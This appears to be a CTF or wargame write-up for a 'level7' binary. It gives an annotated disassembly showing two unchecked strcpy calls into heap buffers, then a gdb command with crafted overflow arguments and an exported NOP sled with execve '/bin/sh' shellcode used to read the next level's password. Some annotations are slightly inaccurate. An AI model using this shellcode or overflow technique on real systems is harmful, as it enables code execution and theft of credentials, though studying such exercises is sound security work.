main:
0x08048521 <+0>:	push   %ebp
0x08048522 <+1>:	mov    %esp,%ebp
0x08048524 <+3>:	and    $0xfffffff0,%esp

0x08048527 <+6>:	sub    $0x20,%esp ; 32

0x0804852a <+9>:	movl   $0x8,(%esp)
0x08048531 <+16>:	call   0x80483f0 <malloc@plt> ; malloc(8); = b1 ; 0x0804A008
0x08048536 <+21>:	mov    %eax,0x1c(%esp) ; on met l'adresse dans esp : 0x1c - b1
0x0804853a <+25>:	mov    0x1c(%esp),%eax ;
0x0804853e <+29>:	movl   $0x1,(%eax) ; b1[0] = 1

0x08048544 <+35>:	movl   $0x8,(%esp)
0x0804854b <+42>:	call   0x80483f0 <malloc@plt> ; malloc(8) ; b2 ; 0x0804A018
0x08048550 <+47>:	mov    %eax,%edx ; b2 = edx

0x08048552 <+49>:	mov    0x1c(%esp),%eax
0x08048556 <+53>:	mov    %edx,0x4(%eax) ; b1 + 4 = b2

0x08048559 <+56>:	movl   $0x8,(%esp)
0x08048560 <+63>:	call   0x80483f0 <malloc@plt> ; malloc(8) ; b3 ; 0x0804A028
0x08048565 <+68>:	mov    %eax,0x18(%esp) ; esp + 0x18 = b3
0x08048569 <+72>:	mov    0x18(%esp),%eax
0x0804856d <+76>:	movl   $0x2,(%eax) ; b3[0] = 2

0x08048573 <+82>:	movl   $0x8,(%esp)
0x0804857a <+89>:	call   0x80483f0 <malloc@plt> ; malloc(8) ; b4 ; 0x0804A038

0x0804857f <+94>:	mov    %eax,%edx
0x08048581 <+96>:	mov    0x18(%esp),%eax ; eax = b3
0x08048585 <+100>:	mov    %edx,0x4(%eax) ; b2 + 4 = b3

0x08048588 <+103>:	mov    0xc(%ebp),%eax ; argv
0x0804858b <+106>:	add    $0x4,%eax ; argv + 1
0x0804858e <+109>:	mov    (%eax),%eax ; argv[1]
0x08048590 <+111>:	mov    %eax,%edx ; edx = argv[1]
0x08048592 <+113>:	mov    0x1c(%esp),%eax ; eax = b1
0x08048596 <+117>:	mov    0x4(%eax),%eax ; eax = b1 + 4 = b2

0x08048599 <+120>:	mov    %edx,0x4(%esp) ; argv[1]
0x0804859d <+124>:	mov    %eax,(%esp) ; b2
0x080485a0 <+127>:	call   0x80483e0 <strcpy@plt> ; strcpy(b2, argv[1])

0x080485a5 <+132>:	mov    0xc(%ebp),%eax ; argv
0x080485a8 <+135>:	add    $0x8,%eax ; argv + 2
0x080485ab <+138>:	mov    (%eax),%eax ; argv[2]
0x080485ad <+140>:	mov    %eax,%edx ; edx = argv[2]
0x080485af <+142>:	mov    0x18(%esp),%eax ; eax = b3
0x080485b3 <+146>:	mov    0x4(%eax),%eax ; eax = b3 + 4 = b4;
0x080485b6 <+149>:	mov    %edx,0x4(%esp)
0x080485ba <+153>:	mov    %eax,(%esp)
0x080485bd <+156>:	call   0x80483e0 <strcpy@plt> ; strcpy(b4, argv[2])

0x080485c2 <+161>:	mov    $0x80486e9,%edx ; r
0x080485c7 <+166>:	mov    $0x80486eb,%eax ; /home/user/level8/.pass
0x080485cc <+171>:	mov    %edx,0x4(%esp)
0x080485d0 <+175>:	mov    %eax,(%esp)
0x080485d3 <+178>:	call   0x8048430 <fopen@plt> fopen("r", "/home/user/level8/.pass").

0x080485d8 <+183>:	mov    %eax,0x8(%esp)
0x080485dc <+187>:	movl   $0x44,0x4(%esp)
0x080485e4 <+195>:	movl   $0x8049960,(%esp)
0x080485eb <+202>:	call   0x80483c0 <fgets@plt> fgets(g, 68, stream)

0x080485f0 <+207>:	movl   $0x8048703,(%esp) ;
0x080485f7 <+214>:	call   0x8048400 <puts@plt> puts("~~")
0x080485fc <+219>:	mov    $0x0,%eax
0x08048601 <+224>:	leave
0x08048602 <+225>:	ret

addresse de eip : 0xbffff71c
addresse du shellcode : 0xbffff047

gdb --args /home/user/level7/level7 `python -c "print '\x90' * 20 + '\xcc''\xcf''\xff''\xbf'"` `python -c "print '\x47''\xf0''\xff''\xbf'"`


export BINSH=`python -c "print '\x90' * 10000 + '\x31''\xc0''\x50''\x68''\x2f''\x2f''\x73''\x68''\x68''\x2f''\x62''\x69''\x6e''\x89''\xe3''\x89''\xc1''\x89''\xc2''\xb0''\x0b''\xcd''\x80''\x31''\xc0''\x40''\xcd''\x80'"`


b2 : 00000000
b1 : 1000b2
b4 : 00000000
b3 : 2000b4


 0x08048703 - tilde
 0x08049960 - g
 0x0804A008 - b1[0]
 0x0804A018 - b1[1]
 0x0804A028 - b3[0]
 0x0804A038 - b3[1]
